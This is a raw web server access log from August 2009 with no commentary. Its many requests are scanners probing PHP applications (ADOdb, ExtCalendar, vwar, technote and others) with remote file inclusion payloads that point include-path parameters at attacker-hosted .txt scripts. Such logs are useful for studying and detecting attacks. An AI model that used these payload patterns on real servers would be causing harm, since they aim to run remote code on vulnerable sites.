211.192.139.106 - - [16/Aug/2009:03:59:38 -0500] "GET /logs/dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=http://hannegirls.ms.kr/board/skin/uks_gallery_v2010//id1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
211.192.139.106 - - [16/Aug/2009:03:59:38 -0500] "GET /dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=http://hannegirls.ms.kr/board/skin/uks_gallery_v2010//id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
211.192.139.106 - - [16/Aug/2009:03:59:38 -0500] "GET /logs/access_log.1247961600/dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=http://hannegirls.ms.kr/board/skin/uks_gallery_v2010//id1.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
195.225.168.186 - - [16/Aug/2009:04:00:03 -0500] "GET /logs/historytemplate.php?cms[support]=1&cms[tngpath]=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 307 "-""Mozilla/5.0"
195.225.168.186 - - [16/Aug/2009:04:00:03 -0500] "GET /logs/access_log.1236038400/historytemplate.php?cms[support]=1&cms[tngpath]=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
195.225.168.186 - - [16/Aug/2009:04:00:03 -0500] "GET /historytemplate.php?cms[support]=1&cms[tngpath]=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
195.225.168.186 - - [16/Aug/2009:04:00:08 -0500] "GET /?_SERVER[DOCUMENT_ROOT]=http://alandar.net/www2/log1.txt? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
195.225.168.186 - - [16/Aug/2009:04:00:08 -0500] "GET /logs/access_log.1236038400/?_SERVER[DOCUMENT_ROOT]=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
195.225.168.186 - - [16/Aug/2009:04:00:16 -0500] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://alandar.net/www2/log1.txt? HTTP/1.1" 200 36689 "-""Mozilla/5.0"
81.180.117.140 - - [16/Aug/2009:04:00:35 -0500] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.investment.kg/en/installationx/perkosa.txt??? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
81.180.117.140 - - [16/Aug/2009:04:00:36 -0500] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.investment.kg/en/installationx/perkosa.txt??? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
207.158.22.128 - - [16/Aug/2009:04:00:40 -0500] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
207.158.22.128 - - [16/Aug/2009:04:00:40 -0500] "GET ////skin/ggambo7002_board/comment_modify.php?dir=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
207.158.22.128 - - [16/Aug/2009:04:00:40 -0500] "GET /logs/access_log.1247788800////skin/ggambo7002_board/comment_modify.php?dir=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 353 "-""Mozilla/5.0"
207.158.22.128 - - [16/Aug/2009:04:00:45 -0500] "GET /logs/access_log.1247875200////skin/ggambo7002_board/comment_modify.php?dir=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 353 "-""Mozilla/5.0"
66.246.252.166 - - [16/Aug/2009:04:00:51 -0500] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.edu-math.com/upload_question_images/fx29id1.txt?? HTTP/1.1" 200 3247 "-""Mozilla/5.0"
66.246.252.166 - - [16/Aug/2009:04:00:51 -0500] "GET /logs/access_log.1242172800////?_SERVER[DOCUMENT_ROOT]=http://www.edu-math.com/upload_question_images/fx29id1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
66.246.252.166 - - [16/Aug/2009:04:00:52 -0500] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.edu-math.com/upload_question_images/fx29id1.txt?? HTTP/1.1" 200 201283 "-""Mozilla/5.0"
195.225.168.186 - - [16/Aug/2009:04:02:12 -0500] "GET /historytemplate.php?cms[support]=1&cms[tngpath]=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
195.225.168.186 - - [16/Aug/2009:04:02:12 -0500] "GET /logs/access_log.1236038400/historytemplate.php?cms[support]=1&cms[tngpath]=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
195.225.168.186 - - [16/Aug/2009:04:02:12 -0500] "GET /logs/historytemplate.php?cms[support]=1&cms[tngpath]=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 307 "-""Mozilla/5.0"
195.225.168.186 - - [16/Aug/2009:04:02:20 -0500] "GET /historytemplate.php?cms[support]=1&cms[tngpath]=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
195.225.168.186 - - [16/Aug/2009:04:02:20 -0500] "GET /logs/access_log.1236038400/historytemplate.php?cms[support]=1&cms[tngpath]=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
195.225.168.186 - - [16/Aug/2009:04:02:20 -0500] "GET /logs/historytemplate.php?cms[support]=1&cms[tngpath]=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 307 "-""Mozilla/5.0"
203.236.100.30 - - [16/Aug/2009:04:06:20 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
203.236.100.30 - - [16/Aug/2009:04:06:20 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
203.236.100.30 - - [16/Aug/2009:04:06:20 -0500] "GET /logs/access_log.1237507200//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
203.236.100.30 - - [16/Aug/2009:04:06:53 -0500] "GET /logs/access_log.1237507200//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
203.236.100.30 - - [16/Aug/2009:04:06:53 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
203.236.100.30 - - [16/Aug/2009:04:06:53 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
69.73.159.26 - - [16/Aug/2009:04:07:31 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
69.73.159.26 - - [16/Aug/2009:04:07:31 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
69.73.159.26 - - [16/Aug/2009:04:07:31 -0500] "GET /logs/access_log.1236470400//modules/xfsection/modify.php?dir_module=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
69.73.159.26 - - [16/Aug/2009:04:07:38 -0500] "GET /logs/access_log.1235692800//modules/xfsection/modify.php?dir_module=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
72.3.139.249 - - [16/Aug/2009:04:09:00 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
72.3.139.249 - - [16/Aug/2009:04:09:00 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
72.3.139.249 - - [16/Aug/2009:04:09:00 -0500] "GET /logs/access_log.1236470400//modules/xfsection/modify.php?dir_module=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
72.3.139.249 - - [16/Aug/2009:04:09:03 -0500] "GET /logs/access_log.1236470400//modules/xfsection/modify.php?dir_module=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
72.3.139.249 - - [16/Aug/2009:04:09:03 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
72.3.139.249 - - [16/Aug/2009:04:09:04 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
72.3.139.249 - - [16/Aug/2009:04:09:04 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
72.3.139.249 - - [16/Aug/2009:04:09:04 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
72.3.139.249 - - [16/Aug/2009:04:09:04 -0500] "GET /logs/access_log.1236470400//modules/xfsection/modify.php?dir_module=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
72.3.139.249 - - [16/Aug/2009:04:09:09 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
72.3.139.249 - - [16/Aug/2009:04:09:09 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
72.3.139.249 - - [16/Aug/2009:04:09:11 -0500] "GET /logs/access_log.1235692800//modules/xfsection/modify.php?dir_module=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
72.3.139.249 - - [16/Aug/2009:04:09:13 -0500] "GET /logs/access_log.1236470400//modules/xfsection/modify.php?dir_module=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
72.3.139.249 - - [16/Aug/2009:04:09:16 -0500] "GET /logs/access_log.1235692800//modules/xfsection/modify.php?dir_module=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
72.3.139.249 - - [16/Aug/2009:04:09:17 -0500] "GET /logs/access_log.1235692800//modules/xfsection/modify.php?dir_module=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
72.3.139.249 - - [16/Aug/2009:04:09:18 -0500] "GET /logs/access_log.1235692800//modules/xfsection/modify.php?dir_module=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
66.246.252.166 - - [16/Aug/2009:04:10:29 -0500] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 200 3247 "-""Mozilla/5.0"
66.246.252.166 - - [16/Aug/2009:04:10:29 -0500] "GET /logs/access_log.1242172800////?_SERVER[DOCUMENT_ROOT]=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
66.246.252.166 - - [16/Aug/2009:04:10:30 -0500] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 200 201283 "-""Mozilla/5.0"
116.122.158.207 - - [16/Aug/2009:04:10:30 -0500] "GET /logs/access_log.1237507200//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
116.122.158.207 - - [16/Aug/2009:04:10:30 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
116.122.158.207 - - [16/Aug/2009:04:10:30 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
69.73.159.26 - - [16/Aug/2009:04:10:52 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
69.73.159.26 - - [16/Aug/2009:04:10:52 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
69.73.159.26 - - [16/Aug/2009:04:10:53 -0500] "GET /logs/access_log.1236470400//modules/xfsection/modify.php?dir_module=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
69.73.159.26 - - [16/Aug/2009:04:11:02 -0500] "GET /logs/access_log.1235692800//modules/xfsection/modify.php?dir_module=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
66.246.252.166 - - [16/Aug/2009:04:11:06 -0500] "GET /logs/access_log.1241222400////?_SERVER[DOCUMENT_ROOT]=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
66.246.252.166 - - [16/Aug/2009:04:11:25 -0500] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 200 3247 "-""Mozilla/5.0"
66.246.252.166 - - [16/Aug/2009:04:11:25 -0500] "GET /logs/access_log.1242172800////?_SERVER[DOCUMENT_ROOT]=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
66.246.252.166 - - [16/Aug/2009:04:11:26 -0500] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 200 201283 "-""Mozilla/5.0"
151.8.79.19 - - [16/Aug/2009:04:11:57 -0500] "GET /logs/access_log.1229904000//index.php?DOCUMENT_ROOT=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
151.8.79.19 - - [16/Aug/2009:04:11:59 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
151.8.79.19 - - [16/Aug/2009:04:11:59 -0500] "GET //index.php?DOCUMENT_ROOT=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
66.246.252.166 - - [16/Aug/2009:04:12:01 -0500] "GET /logs/access_log.1241222400////?_SERVER[DOCUMENT_ROOT]=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
125.141.196.8 - - [16/Aug/2009:04:12:15 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
125.141.196.8 - - [16/Aug/2009:04:12:15 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
125.141.196.8 - - [16/Aug/2009:04:12:15 -0500] "GET /logs/access_log.1237507200//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
151.8.79.19 - - [16/Aug/2009:04:13:23 -0500] "GET /logs/access_log.1235347200//index.php?DOCUMENT_ROOT=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
195.225.168.186 - - [16/Aug/2009:04:14:07 -0500] "GET /?_SERVER[DOCUMENT_ROOT]=http://alandar.net/www2/log1.txt? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
195.225.168.186 - - [16/Aug/2009:04:14:18 -0500] "GET /logs/access_log.1236038400/?_SERVER[DOCUMENT_ROOT]=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
195.225.168.186 - - [16/Aug/2009:04:14:18 -0500] "GET /?_SERVER[DOCUMENT_ROOT]=http://alandar.net/www2/log1.txt? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
195.225.168.186 - - [16/Aug/2009:04:14:31 -0500] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://alandar.net/www2/log1.txt? HTTP/1.1" 200 44885 "-""Mozilla/5.0"
195.225.168.186 - - [16/Aug/2009:04:14:31 -0500] "GET /?_SERVER[DOCUMENT_ROOT]=http://alandar.net/www2/log1.txt? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
195.225.168.186 - - [16/Aug/2009:04:14:32 -0500] "GET /logs/access_log.1236038400/?_SERVER[DOCUMENT_ROOT]=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
222.73.17.7 - - [16/Aug/2009:04:14:39 -0500] "GET /////?_zb_path=http://www.princedent.com/bbs/set_up/1.txt???? HTTP/1.1" 200 3248 "-""Mozilla/5.0"
222.73.17.7 - - [16/Aug/2009:04:14:39 -0500] "GET /logs/access_log.1237680000/////?_zb_path=http://www.princedent.com/bbs/set_up/1.txt???? HTTP/1.1" 404 314 "-""Mozilla/5.0"
222.73.17.7 - - [16/Aug/2009:04:14:43 -0500] "GET /logs/////?_zb_path=http://www.princedent.com/bbs/set_up/1.txt???? HTTP/1.1" 200 201284 "-""Mozilla/5.0"
195.225.168.186 - - [16/Aug/2009:04:14:45 -0500] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://alandar.net/www2/log1.txt? HTTP/1.1" 200 69473 "-""Mozilla/5.0"
195.225.168.186 - - [16/Aug/2009:04:14:47 -0500] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://alandar.net/www2/log1.txt? HTTP/1.1" 200 201276 "-""Mozilla/5.0"
195.225.168.186 - - [16/Aug/2009:04:14:52 -0500] "GET /logs/access_log.1236038400/?_SERVER[DOCUMENT_ROOT]=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
125.141.196.8 - - [16/Aug/2009:04:14:52 -0500] "GET //index.php?DOCUMENT_ROOT=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
125.141.196.8 - - [16/Aug/2009:04:14:52 -0500] "GET /logs/access_log.1229904000//index.php?DOCUMENT_ROOT=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
125.141.196.8 - - [16/Aug/2009:04:14:52 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
195.225.168.186 - - [16/Aug/2009:04:14:53 -0500] "GET /?_SERVER[DOCUMENT_ROOT]=http://alandar.net/www2/log1.txt? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
195.225.168.186 - - [16/Aug/2009:04:15:03 -0500] "GET /logs/access_log.1236038400/?_SERVER[DOCUMENT_ROOT]=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
195.225.168.186 - - [16/Aug/2009:04:15:03 -0500] "GET /?_SERVER[DOCUMENT_ROOT]=http://alandar.net/www2/log1.txt? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
195.225.168.186 - - [16/Aug/2009:04:15:06 -0500] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://alandar.net/www2/log1.txt? HTTP/1.1" 200 201276 "-""Mozilla/5.0"
195.225.168.186 - - [16/Aug/2009:04:15:59 -0500] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://alandar.net/www2/log1.txt? HTTP/1.1" 200 159629 "-""Mozilla/5.0"
69.174.114.20 - - [16/Aug/2009:04:16:12 -0500] "GET /binn_include_path=http://www.flintriver.co.uk/upload/idxx.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
69.174.114.20 - - [16/Aug/2009:04:16:12 -0500] "GET /logs/binn_include_path=http://www.flintriver.co.uk/upload/idxx.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
69.174.114.20 - - [16/Aug/2009:04:16:12 -0500] "GET /logs/access_log.1243641600/binn_include_path=http://www.flintriver.co.uk/upload/idxx.txt?? HTTP/1.1" 404 371 "-""Mozilla/5.0"
69.174.114.20 - - [16/Aug/2009:04:16:12 -0500] "GET /logs/access_log.1243555200/binn_include_path=http://www.flintriver.co.uk/upload/idxx.txt?? HTTP/1.1" 404 371 "-""Mozilla/5.0"
69.174.114.20 - - [16/Aug/2009:04:16:21 -0500] "GET /binn_include_path=http://www.flintriver.co.uk/upload/idxx.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
69.174.114.20 - - [16/Aug/2009:04:16:21 -0500] "GET /logs/binn_include_path=http://www.flintriver.co.uk/upload/idxx.txt? HTTP/1.1" 404 349 "-""Mozilla/5.0"
69.174.114.20 - - [16/Aug/2009:04:16:21 -0500] "GET /logs/access_log.1243641600/binn_include_path=http://www.flintriver.co.uk/upload/idxx.txt? HTTP/1.1" 404 371 "-""Mozilla/5.0"
69.174.114.20 - - [16/Aug/2009:04:16:21 -0500] "GET /logs/access_log.1243555200/binn_include_path=http://www.flintriver.co.uk/upload/idxx.txt? HTTP/1.1" 404 371 "-""Mozilla/5.0"
125.141.196.8 - - [16/Aug/2009:04:16:23 -0500] "GET /logs/access_log.1235347200//index.php?DOCUMENT_ROOT=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
69.174.114.20 - - [16/Aug/2009:04:16:31 -0500] "GET /binn_include_path=http://www.flintriver.co.uk/upload/idxx.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
69.174.114.20 - - [16/Aug/2009:04:16:31 -0500] "GET /logs/binn_include_path=http://www.flintriver.co.uk/upload/idxx.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
69.174.114.20 - - [16/Aug/2009:04:16:31 -0500] "GET /logs/access_log.1243641600/binn_include_path=http://www.flintriver.co.uk/upload/idxx.txt?? HTTP/1.1" 404 371 "-""Mozilla/5.0"
69.174.114.20 - - [16/Aug/2009:04:16:31 -0500] "GET /logs/access_log.1243555200/binn_include_path=http://www.flintriver.co.uk/upload/idxx.txt?? HTTP/1.1" 404 371 "-""Mozilla/5.0"
69.174.114.20 - - [16/Aug/2009:04:16:45 -0500] "GET /logs/binn_include_path=http://www.flintriver.co.uk/upload/idxx.txt? HTTP/1.1" 404 349 "-""Mozilla/5.0"
69.174.114.20 - - [16/Aug/2009:04:16:45 -0500] "GET /binn_include_path=http://www.flintriver.co.uk/upload/idxx.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
69.174.114.20 - - [16/Aug/2009:04:16:45 -0500] "GET /logs/access_log.1243641600/binn_include_path=http://www.flintriver.co.uk/upload/idxx.txt? HTTP/1.1" 404 371 "-""Mozilla/5.0"
69.174.114.20 - - [16/Aug/2009:04:16:45 -0500] "GET /logs/access_log.1243555200/binn_include_path=http://www.flintriver.co.uk/upload/idxx.txt? HTTP/1.1" 404 371 "-""Mozilla/5.0"
222.73.17.7 - - [16/Aug/2009:04:17:15 -0500] "GET /////?_zb_path=http://www.princedent.com/bbs/set_up/1.txt???? HTTP/1.1" 200 3248 "-""Mozilla/5.0"
222.73.17.7 - - [16/Aug/2009:04:17:15 -0500] "GET /logs/access_log.1237680000/////?_zb_path=http://www.princedent.com/bbs/set_up/1.txt???? HTTP/1.1" 404 314 "-""Mozilla/5.0"
222.73.17.7 - - [16/Aug/2009:04:17:21 -0500] "GET /logs/////?_zb_path=http://www.princedent.com/bbs/set_up/1.txt???? HTTP/1.1" 200 201284 "-""Mozilla/5.0"
62.99.247.91 - - [16/Aug/2009:04:18:15 -0500] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.stichtingsamaanta.nl/templates/beez/images_general/.r/id.txt?cmd? HTTP/1.1" 404 348 "-""Mozilla/5.0"
62.99.247.91 - - [16/Aug/2009:04:18:16 -0500] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.stichtingsamaanta.nl/templates/beez/images_general/.r/id.txt?cmd? HTTP/1.1" 404 353 "-""Mozilla/5.0"
62.99.247.91 - - [16/Aug/2009:04:18:19 -0500] "GET /logs/access_log.1231113600//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.stichtingsamaanta.nl/templates/beez/images_general/.r/id.txt?cmd? HTTP/1.1" 404 375 "-""Mozilla/5.0"
99.198.108.66 - - [16/Aug/2009:04:22:06 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
99.198.108.66 - - [16/Aug/2009:04:22:06 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
99.198.108.66 - - [16/Aug/2009:04:22:06 -0500] "GET /logs/access_log.1241049600%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
99.198.108.66 - - [16/Aug/2009:04:22:07 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
99.198.108.66 - - [16/Aug/2009:04:22:07 -0500] "GET /logs/access_log.1241049600%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
99.198.108.66 - - [16/Aug/2009:04:22:07 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
99.198.108.66 - - [16/Aug/2009:04:24:32 -0500] "GET /logs/access_log.1228608000//modules/vwar/admin/admin.php?vwar_root=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
99.198.108.66 - - [16/Aug/2009:04:25:34 -0500] "GET /logs/access_log.1228608000//modules/vwar/admin/admin.php?vwar_root=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
69.174.114.20 - - [16/Aug/2009:04:27:05 -0500] "GET //cron.php?include_path=http://www.flintriver.co.uk/upload/idxx.txt? HTTP/1.1" 404 292 "-""Mozilla/5.0"
69.174.114.20 - - [16/Aug/2009:04:27:05 -0500] "GET /logs//cron.php?include_path=http://www.flintriver.co.uk/upload/idxx.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
69.174.114.20 - - [16/Aug/2009:04:27:05 -0500] "GET /logs/access_log.1236902400//cron.php?include_path=http://www.flintriver.co.uk/upload/idxx.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
69.174.114.20 - - [16/Aug/2009:04:27:06 -0500] "GET /logs//cron.php?include_path=http://www.flintriver.co.uk/upload/idxx.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
69.174.114.20 - - [16/Aug/2009:04:27:06 -0500] "GET //cron.php?include_path=http://www.flintriver.co.uk/upload/idxx.txt? HTTP/1.1" 404 292 "-""Mozilla/5.0"
69.174.114.20 - - [16/Aug/2009:04:27:06 -0500] "GET /logs/access_log.1236902400//cron.php?include_path=http://www.flintriver.co.uk/upload/idxx.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
69.174.114.20 - - [16/Aug/2009:04:27:08 -0500] "GET //cron.php?include_path=http://www.flintriver.co.uk/upload/idxx.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
69.174.114.20 - - [16/Aug/2009:04:27:08 -0500] "GET /logs//cron.php?include_path=http://www.flintriver.co.uk/upload/idxx.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
